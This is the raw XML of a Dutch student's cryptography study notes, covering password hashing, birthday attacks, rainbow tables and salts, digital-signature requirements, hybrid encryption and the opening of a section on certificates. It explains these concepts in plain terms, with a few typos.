    <w:p w14:paraId="1625CE44" w14:textId="7DCC7F23" w:rsidR="004A0936" w:rsidRDefault="000951A7" w:rsidP="00AE4A34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Collission Free</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464FC885" w14:textId="5EE6F553" w:rsidR="000951A7" w:rsidRDefault="000951A7" w:rsidP="000951A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bijna mogelijk om een 2</w:t>
      </w:r>
      <w:r w:rsidRPr="000951A7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Message te zoeken die identiek dezelfde Hash geeft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735D5731" w14:textId="37264CB0" w:rsidR="000951A7" w:rsidRDefault="000951A7" w:rsidP="000951A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Indien dit toch gebeurt betekent dit wel </w:t>
      </w:r>
      <w:r w:rsidRPr="000951A7">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>NIET</w:t>
      </w:r>
      <w:r w:rsidRPr="000951A7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>da Message 1 en Message 2 identiek zijn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FD036D" w14:textId="77777777" w:rsidR="003E2D0F" w:rsidRDefault="003E2D0F" w:rsidP="003E2D0F"/>
    <w:p w14:paraId="184E2280" w14:textId="52384E78" w:rsidR="00A61E6E" w:rsidRDefault="00A61E6E" w:rsidP="003E2D0F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Hashing proces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCE1FAD" w14:textId="77777777" w:rsidR="00A61E6E" w:rsidRDefault="00A61E6E" w:rsidP="00A61E6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Paswoord opslaan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55273253" w14:textId="27A1F54F" w:rsidR="00A61E6E" w:rsidRDefault="00A61E6E" w:rsidP="00A61E6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“myPassword” -&gt; Hash algoritme -&gt; Hash stop je in de DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE3B4E2" w14:textId="77777777" w:rsidR="00A61E6E" w:rsidRDefault="00A61E6E" w:rsidP="00A61E6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Incorrrect paswoord checken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544C52A2" w14:textId="309F3305" w:rsidR="00A61E6E" w:rsidRDefault="00A61E6E" w:rsidP="00A61E6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“notMyPassword” -&gt; Hash algoritme -&gt; Komt dit overeen met de Hash in de DB?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7468389F" w14:textId="5D5130D5" w:rsidR="002E456F" w:rsidRDefault="002E456F" w:rsidP="00A61E6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nee -&gt; Inloggen faalt!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569DB7DB" w14:textId="34EBB04B" w:rsidR="00A61E6E" w:rsidRDefault="00A61E6E" w:rsidP="00A61E6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Correct paswoord checken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66751677" w14:textId="13AA1815" w:rsidR="00A61E6E" w:rsidRDefault="00A61E6E" w:rsidP="00A61E6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“myPassword” -&gt; Hash algoritme -&gt; Komt dit overeen met de Hash in de DB?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6A8FD4" w14:textId="361CACAE" w:rsidR="00A61E6E" w:rsidRDefault="00A61E6E" w:rsidP="00A61E6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ja -&gt; Inloggen!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102CF47A" w14:textId="77777777" w:rsidR="003E2D0F" w:rsidRDefault="003E2D0F" w:rsidP="003E2D0F"/>
    <w:p w14:paraId="65083877" w14:textId="6E49FA85" w:rsidR="00AD53FB" w:rsidRDefault="0010497F" w:rsidP="00AD53FB">
      <w:r>
        <w:t>Een Hash dient niet om een bericht onleesbaar te maken, het waarborgt enkel de integriteit</w:t>
      </w:r>
      <w:r w:rsidR="00864F5A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271CAB17" w14:textId="77777777" w:rsidR="003E2D0F" w:rsidRDefault="003E2D0F" w:rsidP="00AD53FB"/>
    <w:p w14:paraId="47BFFF21" w14:textId="2BAB7054" w:rsidR="00CF6ACF" w:rsidRDefault="00CF6ACF" w:rsidP="00CF6ACF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Birthday Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B010A19" w14:textId="77777777" w:rsidR="00CF6ACF" w:rsidRDefault="00CF6ACF" w:rsidP="00CF6ACF"/>
    <w:p w14:paraId="21ED5B24" w14:textId="212CB675" w:rsidR="00CF6ACF" w:rsidRDefault="00CF6ACF" w:rsidP="00CF6ACF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Paswoorden worden gehashed bijgehouden in een DB, bv 128-bit hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE722BE" w14:textId="4A9F6166" w:rsidR="00CF6ACF" w:rsidRDefault="00CF6ACF" w:rsidP="00CF6ACF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aantal paswoorden = gigantisch veel = variabele lengte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB73171" w14:textId="4F7DCE15" w:rsidR="00CF6ACF" w:rsidRPr="00CF6ACF" w:rsidRDefault="00CF6ACF" w:rsidP="00CF6ACF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aantal hashwaarden = enorm veel = 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6ACF">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2857E4D4" w14:textId="77777777" w:rsidR="00CF6ACF" w:rsidRDefault="00CF6ACF" w:rsidP="00CF6ACF"/>
    <w:p w14:paraId="4EF273C1" w14:textId="36AE408C" w:rsidR="00CF6ACF" w:rsidRDefault="00CF6ACF" w:rsidP="00CF6ACF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Een Birthday Attack staat op het principe dat als je in een kamer iemand zoekt die </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6ACF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">exact </w:t>
      </w:r>
      <w:r>
        <w:t>dezelfde geboortedatum als jou heeft, de klein is dat je hem zal vinden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42288F1C" w14:textId="2A483F94" w:rsidR="002F0C2D" w:rsidRDefault="00CF6ACF" w:rsidP="00214337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Via kansberekening zou je 253 mensen moet vinden vooraleer je die ene persoon gevonden hebt!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5185079E" w14:textId="27407FFF" w:rsidR="002F0C2D" w:rsidRDefault="002F0C2D" w:rsidP="002F0C2D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Indien je zoekt naar 2 mensen die dezelfde geboortedatum hebben is die kans al veel groter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6364A761" w14:textId="72169069" w:rsidR="0086122C" w:rsidRDefault="002F0C2D" w:rsidP="00214337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Je zou maar 23 mensen moeten vinden!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D7E50E" w14:textId="066D1E40" w:rsidR="00E47D9F" w:rsidRPr="00524C8A" w:rsidRDefault="00792813" w:rsidP="00214337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524C8A">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Een willekeurige collis</w:t>
      </w:r>
      <w:r w:rsidR="0086122C" w:rsidRPr="00524C8A">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ion vinden is minde</w:t>
      </w:r>
      <w:r w:rsidRPr="00524C8A">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>r moeilijk dan een exacte colli</w:t>
      </w:r>
      <w:r w:rsidR="0086122C" w:rsidRPr="00524C8A">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C49A68E" w14:textId="36632E08" w:rsidR="00E47D9F" w:rsidRDefault="00E47D9F" w:rsidP="00214337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Het aantal verbindingen tussen mensen neemt toe als het</w:t>
      </w:r>
      <w:r w:rsidR="00726717">
        <w:t xml:space="preserve"> totale</w:t>
      </w:r>
      <w:r w:rsidR="00623A23">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aantal </w:t>
      </w:r>
      <w:r w:rsidR="00834B5F">
        <w:t xml:space="preserve">personen </w:t>
      </w:r>
      <w:r>
        <w:t>stijgt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29166AA6" w14:textId="77777777" w:rsidR="00524C8A" w:rsidRDefault="00524C8A" w:rsidP="00524C8A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07AA8D47" w14:textId="0D0C39E9" w:rsidR="00E47D9F" w:rsidRDefault="00524C8A" w:rsidP="00524C8A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Gevolgen voor Hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C063553" w14:textId="77777777" w:rsidR="00524C8A" w:rsidRDefault="00524C8A" w:rsidP="00524C8A"/>
    <w:p w14:paraId="753894E1" w14:textId="17F20AEB" w:rsidR="00524C8A" w:rsidRDefault="00524C8A" w:rsidP="00524C8A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Als een hacker </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF3E1B">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>exact</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF3E1B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>jouw paswoord wil vinden is de kans zeer klein dat dit lukt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE62E45" w14:textId="54CC9160" w:rsidR="00524C8A" w:rsidRDefault="00524C8A" w:rsidP="00214337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hij zou 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00524C8A">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / 2 paswoorden moeten afgaan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17203F1D" w14:textId="2B499900" w:rsidR="00524C8A" w:rsidRDefault="00524C8A" w:rsidP="00524C8A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Als hij 50% kans wil hebben om een random paswoord te vinden is de kans al iets groter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159EF1F1" w14:textId="2A539640" w:rsidR="00524C8A" w:rsidRDefault="00524C8A" w:rsidP="00524C8A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hij zou 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / 2 paswoorden moeten afgaan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8DF5E3" w14:textId="77777777" w:rsidR="00524C8A" w:rsidRDefault="00524C8A" w:rsidP="00524C8A"/>
    <w:p w14:paraId="63B7DE3A" w14:textId="5D44F0B2" w:rsidR="00524C8A" w:rsidRDefault="002C0CA6" w:rsidP="00524C8A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidR="00524C8A">
        <w:lastRenderedPageBreak/>
        <w:t>Rainbow Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1CA766" w14:textId="77777777" w:rsidR="00524C8A" w:rsidRDefault="00524C8A" w:rsidP="00524C8A"/>
    <w:p w14:paraId="04CB00CB" w14:textId="5721E4DB" w:rsidR="00524C8A" w:rsidRDefault="00524C8A" w:rsidP="00524C8A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Paswoorden zijn nooit random en worden vaak hergebruikt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1BC358" w14:textId="12C7E2F9" w:rsidR="00524C8A" w:rsidRDefault="00524C8A" w:rsidP="00524C8A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Een hacker maakt een </w:t>
      </w:r>
      <w:r w:rsidR="009F7E35">
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ictionary aan van veel gebruikte paswoorden, samen met hun </w:t>
      </w:r>
      <w:r w:rsidR="0031078E">
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:t>ash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5216B2E5" w14:textId="76BA03D2" w:rsidR="007C497C" w:rsidRDefault="007C497C" w:rsidP="00524C8A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hacker vergelijk zijn tabel met die van de DB en als er een match is kan hij inloggen met </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>EEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> paswoord.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7430FFE0" w14:textId="77777777" w:rsidR="00FC737B" w:rsidRDefault="00FC737B" w:rsidP="00FC737B"/>
    <w:p w14:paraId="62B735B6" w14:textId="7820856E" w:rsidR="00FC737B" w:rsidRDefault="00FC737B" w:rsidP="00FC737B">
      <w:r>
        <w:t xml:space="preserve">Om dit proces tegen te gaan moet een </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6D83">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>salt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gebruiken vooraleer je gaat hashen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA2C4EE" w14:textId="22826ED2" w:rsidR="00ED07AA" w:rsidRDefault="00FC737B" w:rsidP="00524C8A">
      <w:r>
        <w:t>Iedere user heeft een random salt en dus ook een “uniek” paswoord.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D2CF28" w14:textId="77777777" w:rsidR="002C0CA6" w:rsidRDefault="002C0CA6" w:rsidP="00524C8A"/>
    <w:p w14:paraId="0A61F9FE" w14:textId="6D7C80E4" w:rsidR="002C0CA6" w:rsidRDefault="002C0CA6" w:rsidP="00524C8A">
      <w:r>
        <w:t>In een Rainbow Table wordt enkel het eerste en laatste paswoord bijgehouden, alles tussen in kan berekend worden. Dit vormt dus een soort van ketting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB41979" w14:textId="77777777" w:rsidR="00F90BDA" w:rsidRDefault="00F90BDA" w:rsidP="00524C8A"/>
    <w:p w14:paraId="4A422C85" w14:textId="7B50053E" w:rsidR="00F90BDA" w:rsidRDefault="00F90BDA" w:rsidP="00524C8A">
      <w:r>
        <w:t>De Salt wordt toegevoegd aan de Hash of apart opgeslagen naast de Hash in de DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9F4B14" w14:textId="77777777" w:rsidR="007D0D37" w:rsidRDefault="00F90BDA" w:rsidP="007D0D37">
      <w:r>
        <w:t xml:space="preserve">Een hacker die binnenraakt ziet alle hashes en salts maar zal zijn </w:t>
      </w:r>
      <w:r w:rsidR="007A30FA">
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ainbow </w:t>
      </w:r>
      <w:r w:rsidR="007A30FA">
        <w:t>Ta</w:t>
      </w:r>
      <w:r>
        <w:t>ble helemaal opnieuw moeten laten bereke</w:t>
      </w:r>
      <w:r w:rsidR="005035EE">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="008F4F2C">
        <w:t>en</w:t>
      </w:r>
      <w:r w:rsidR="005035EE">
        <w:t xml:space="preserve"> = duurt lang = niet de moeite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A493A36" w14:textId="77777777" w:rsidR="007D0D37" w:rsidRDefault="007D0D37" w:rsidP="007D0D37"/>
    <w:p w14:paraId="2456009F" w14:textId="3D1002D3" w:rsidR="00250F21" w:rsidRDefault="00250F21" w:rsidP="007D0D37">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc453378494"/>
      <w:r>
        <w:t>Digitale handtekeningen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="6E8DFFE8" w14:textId="77777777" w:rsidR="00250F21" w:rsidRDefault="00250F21" w:rsidP="00250F21"/>
    <w:p w14:paraId="0D27918E" w14:textId="7C928B06" w:rsidR="00250F21" w:rsidRDefault="00250F21" w:rsidP="00250F21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identiteit van verzender waarborgen!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195B9D6E" w14:textId="3E01DB40" w:rsidR="00D86B85" w:rsidRPr="00D86B85" w:rsidRDefault="00D86B85" w:rsidP="00D86B8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D86B85">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Voorwaarden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6844F49F" w14:textId="102FCDE9" w:rsidR="00D86B85" w:rsidRPr="00E17E9F" w:rsidRDefault="00955FFD" w:rsidP="00D86B85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E17E9F">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Niet vervalsbaar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CA7D25" w14:textId="7F0099F3" w:rsidR="00955FFD" w:rsidRPr="00E17E9F" w:rsidRDefault="00955FFD" w:rsidP="00D86B85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E17E9F">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Authentiek</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FB127A" w14:textId="1F367AB6" w:rsidR="00955FFD" w:rsidRPr="00E17E9F" w:rsidRDefault="00955FFD" w:rsidP="00D86B85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E17E9F">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Niet herbruikbaar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551EF1FE" w14:textId="2A5F5666" w:rsidR="00955FFD" w:rsidRPr="00E17E9F" w:rsidRDefault="00955FFD" w:rsidP="00D86B85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E17E9F">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Niet veranderbaar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080E5F01" w14:textId="268240E7" w:rsidR="00955FFD" w:rsidRDefault="00955FFD" w:rsidP="00D86B85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E17E9F">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Niet verloochenbaar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262B5A68" w14:textId="77777777" w:rsidR="00FA3AE5" w:rsidRDefault="00FA3AE5" w:rsidP="00FA3AE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723E1461" w14:textId="1262ACDB" w:rsidR="00651C2A" w:rsidRDefault="00651C2A" w:rsidP="00651C2A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc453378495"/>
      <w:r>
        <w:t>Hybride Cryptografie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="6133B7DA" w14:textId="77777777" w:rsidR="00B47E48" w:rsidRDefault="00B47E48" w:rsidP="00B47E48"/>
    <w:p w14:paraId="5FC20DC7" w14:textId="1A4F3216" w:rsidR="00B47E48" w:rsidRDefault="00B47E48" w:rsidP="00214337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>AES/DES = snel</w:t>
      </w:r>
      <w:r w:rsidR="009B22DD">
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:r>
        <w:t>RSA = beter Key Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C81DBA5" w14:textId="6CD3F752" w:rsidR="007C7F18" w:rsidRDefault="007C7F18" w:rsidP="00B47E48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Combinatie van beiden = IDEAAL!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522412D4" w14:textId="77777777" w:rsidR="007528A7" w:rsidRDefault="007528A7" w:rsidP="007528A7"/>
    <w:p w14:paraId="77568F30" w14:textId="0AA21015" w:rsidR="007528A7" w:rsidRDefault="00250F21" w:rsidP="007528A7">
      <w:r w:rsidRPr="00250F21">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="064F9AF2" wp14:editId="2076F5A7">
            <wp:extent cx="6769368" cy="3717668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4000" contrast="6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5597" cy="3726581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</w:p>
    <w:p w14:paraId="76D0E9CA" w14:textId="34ABD49B" w:rsidR="00640F8B" w:rsidRDefault="00C1211F" w:rsidP="00640F8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00085DA6">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Deze tekening moet je kunnen </w:t>
      </w:r>
      <w:r w:rsidR="004C2E17">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>maken</w:t>
      </w:r>
      <w:r w:rsidRPr="00085DA6">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> op het examen!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E1C3EF" w14:textId="47A5D6A7" w:rsidR="00B9773D" w:rsidRDefault="00640F8B" w:rsidP="00640F8B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_Toc453378496"/>
      <w:r w:rsidR="00B9773D">
        <w:lastRenderedPageBreak/>
        <w:t>Certificaten</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="2CE3B368" w14:textId="77777777" w:rsidR="00B9773D" w:rsidRDefault="00B9773D" w:rsidP="00B9773D"/>
    <w:p w14:paraId="208B8492" w14:textId="236986B8" w:rsidR="00BD2402" w:rsidRDefault="00BD2402" w:rsidP="00BD2402">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Public Key probleem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D5AD9C" w14:textId="77777777" w:rsidR="00BD2402" w:rsidRDefault="00BD2402" w:rsidP="00BD2402"/>
    <w:p w14:paraId="4EB260D2" w14:textId="67ABD4AB" w:rsidR="0056055D" w:rsidRDefault="00BD2402" w:rsidP="00BD2402">
      <w:r>
        <w:t>Je moet kunnen garanderen dat een bepaalde Public Key bij die bepaalde persoon hoort</w:t>
      </w:r>
